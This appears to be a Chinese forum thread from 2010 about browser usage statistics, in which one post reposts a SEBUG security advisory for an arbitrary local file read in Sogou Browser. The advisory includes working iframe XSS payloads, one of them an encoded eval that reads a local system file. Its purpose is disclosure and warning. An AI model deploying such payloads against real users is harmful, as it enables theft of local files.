艾瑞网：2010年7月份浏览器数据出炉 360安全浏览器涨幅喜人

金牛座

回复 60楼 你想怎样  的帖子


    请问是哪款？傲游要装金山见过，金山要装傲游没见过

你想怎样

回复 61楼 金牛座  的帖子

估计你一直在等待我是否能拿出证据 ,  不知你看了此图会不会很失望

Lgwu

回复 53楼 WQZ  的帖子

搜狗爆出任意文件读取漏洞，建议多留意搜狗官方信息，等待补丁推出后及时修复。

搜狗浏览器任意文件读取漏洞
SEBUG-ID:20109
SEBUG-Appdir:搜狗浏览器
发布时间:2010-08-11
影响版本:
搜狗浏览器 2.0.0.1070漏洞描述:
搜狗浏览器设计时存在一些问题，结合一些其他漏洞，可能导致非法用户可以远程读取任意本地文件

搜狗浏览器使用本地的Html来开发一些一些功能，但是其中一个Html里存在着dom类型的xss漏洞，由于xss发生在本地所以可以获得本地的权限，利用javascript即可读取任意的本地文件<*参考
http://www.wooyun.org/bug.php?action=view&id=185
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<iframe src='\\127.0.0.1\c$/Program%20Files/SogouExplorer/StartPage/Local/iframe.html?type=)"><img/src=""onerror=alert();//><!--'

----------------------------------------------

<iframe src='\\127.0.0.1\c$/Program Files/SogouExplorer/StartPage/Local/iframe.html?type=)"><img/width="0"/src=""onerror=eval(unescape(unescape("xmlhttp%253Dnew%2520ActiveXObject%2528%2522Msxml2.XMLHTTP.3.0%2522%2529%253Bxmlhttp.open%2528%2522GET%2522%252C%2522file%253A////127.0.0.1/c%2524/boot.ini%2522%252Cfalse%2529%253Bxmlhttp.send%2528%2529%253Balert%2528xmlhttp.responseText%2529%253B")))><!--'></iframe>SEBUG安全建议:
厂商补丁：
sogou
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://ie.sogou.com/

   

WQZ

回复 63楼 Lgwu  的帖子


   呵，呵我一直只管用还真没发现这些